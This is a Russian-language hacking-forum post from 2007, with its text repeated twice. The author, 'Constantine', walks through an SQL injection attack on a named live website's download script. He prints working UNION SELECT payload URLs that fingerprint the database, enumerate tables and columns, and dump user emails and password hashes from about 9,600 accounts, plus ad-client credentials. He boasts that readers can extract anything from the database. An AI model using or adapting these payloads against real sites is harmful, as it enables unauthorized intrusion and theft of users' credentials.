Constantine
13.06.2007, 16:06
Набрел сегодня на ресурс http://techpowerup.com
Решил посмотреть google p-r 4 индекс цитирования 275, вообщем то достаточно посещаемы... принялся за исследование.
обнаружил что присутствует недостаточная фильтрация параметра id у скриптига get.php
http://www.techpowerup.com/downloads/get.php?id=187
Немного повозился и понял что это ненаглядная 5 ветка
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21/*
Начал исследование
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,count(TABLE_NAME),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21+from+informa tion_schema.tables/*
Первой особо интересной таблой оказалась list_user_user. И тут оказалсь что мажик квотс нету)))
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+information_s chema.columns+where+table_name='list_user_user'/*
Тут же появился запрос
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),confirmed,e ntered,char(58,58,58),email,uniqid,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ list_user_user/*
9600 с чем то пользователей =)
Поехал дальше наткнулся на phpads_clients
Здесь уже все оказалось не так просто
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,column_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+information_s chema.columns+where+table_name='phpads_clients'/*
Запрос получился такой:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,em ail,clientusername,clientpassword),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21+from+phpads_cli ents/*
Но в ответ меня послали, табла не в той базе, пришлось поковыряться с table_schema:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,Table_schema,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+from+information_ schema.tables+where+table_name='phpads_clients'/*
и далее пошел уже правельный запрос:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,em ail,clientusername,clientpassword),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21+from+techpoweru p_ads.phpads_clients/*
Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом..
Прям так все карты я раскрывать не буду, так или иначе методы действия и подходы к выводу инфы я показал, приложив немного усилий вы получите любую информацию из базы =)
Вот такие дела нынче
з.Ы таблы
forum
moderation
moderator
administrator
можно не смотеть
Решил посмотреть google p-r 4 индекс цитирования 275, вообщем то достаточно посещаемы... принялся за исследование.
обнаружил что присутствует недостаточная фильтрация параметра id у скриптига get.php
http://www.techpowerup.com/downloads/get.php?id=187
Немного повозился и понял что это ненаглядная 5 ветка
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21/*
Начал исследование
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,count(TABLE_NAME),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21+from+informa tion_schema.tables/*
Первой особо интересной таблой оказалась list_user_user. И тут оказалсь что мажик квотс нету)))
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+information_s chema.columns+where+table_name='list_user_user'/*
Тут же появился запрос
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),confirmed,e ntered,char(58,58,58),email,uniqid,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ list_user_user/*
9600 с чем то пользователей =)
Поехал дальше наткнулся на phpads_clients
Здесь уже все оказалось не так просто
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,column_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+information_s chema.columns+where+table_name='phpads_clients'/*
Запрос получился такой:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,em ail,clientusername,clientpassword),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21+from+phpads_cli ents/*
Но в ответ меня послали, табла не в той базе, пришлось поковыряться с table_schema:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,Table_schema,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+from+information_ schema.tables+where+table_name='phpads_clients'/*
и далее пошел уже правельный запрос:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,em ail,clientusername,clientpassword),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21+from+techpoweru p_ads.phpads_clients/*
Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом..
Прям так все карты я раскрывать не буду, так или иначе методы действия и подходы к выводу инфы я показал, приложив немного усилий вы получите любую информацию из базы =)
Вот такие дела нынче
з.Ы таблы
forum
moderation
moderator
administrator
можно не смотеть